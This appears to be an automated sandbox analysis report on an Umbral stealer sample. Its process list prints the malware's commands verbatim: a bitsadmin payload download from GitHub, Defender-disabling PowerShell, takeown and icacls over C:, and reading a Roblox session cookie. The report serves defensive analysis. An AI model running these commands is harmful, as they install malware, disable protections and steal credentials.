Malware Analysis Report

2024-10-16 05:04

Sample ID 240809-mwqwdatdma
Target test.exe
SHA256 0996384cead0e1be85b7c15efc3db74bed7cef7513766d0ec8bf5026274ea6a5
Tags
umbral credential_access discovery dropper execution exploit ransomware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0996384cead0e1be85b7c15efc3db74bed7cef7513766d0ec8bf5026274ea6a5

Threat Level: Known bad

The file test.exe was found to be: Known bad.

Malicious Activity Summary

umbral credential_access discovery dropper execution exploit ransomware stealer

Detect Umbral payload

Umbral

Credentials from Password Stores: Credentials from Web Browsers

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Blocklisted process makes network request

Drops file in Drivers directory

Possible privilege escalation attempt

Drops startup file

Modifies file permissions

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Looks up external IP address via web service

Sets desktop wallpaper using registry

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Delays execution with timeout.exe

Runs ping.exe

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Script User-Agent

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 10:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 10:49

Reported

2024-08-09 10:51

Platform

win10v2004-20240802-en

Max time kernel

97s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\test.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 892 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\test.exe C:\Windows\system32\cmd.exe
PID 892 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\test.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2996 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2996 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 2996 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 2996 wrote to memory of 1816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2996 wrote to memory of 1816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2996 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2996 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2996 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2996 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2996 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2996 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4088 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 2996 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2996 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4088 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\attrib.exe
PID 4088 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\attrib.exe
PID 4088 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\cmd.exe
PID 4088 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\cmd.exe
PID 2248 wrote to memory of 2256 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 2248 wrote to memory of 2256 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 2996 wrote to memory of 4852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2996 wrote to memory of 4852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2996 wrote to memory of 2208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 2208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2996 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2996 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\test.exe

"C:\Users\Admin\AppData\Local\Temp\test.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\66C4.tmp\66C5.tmp\66C6.bat C:\Users\Admin\AppData\Local\Temp\test.exe"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4188,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32120.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1230.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

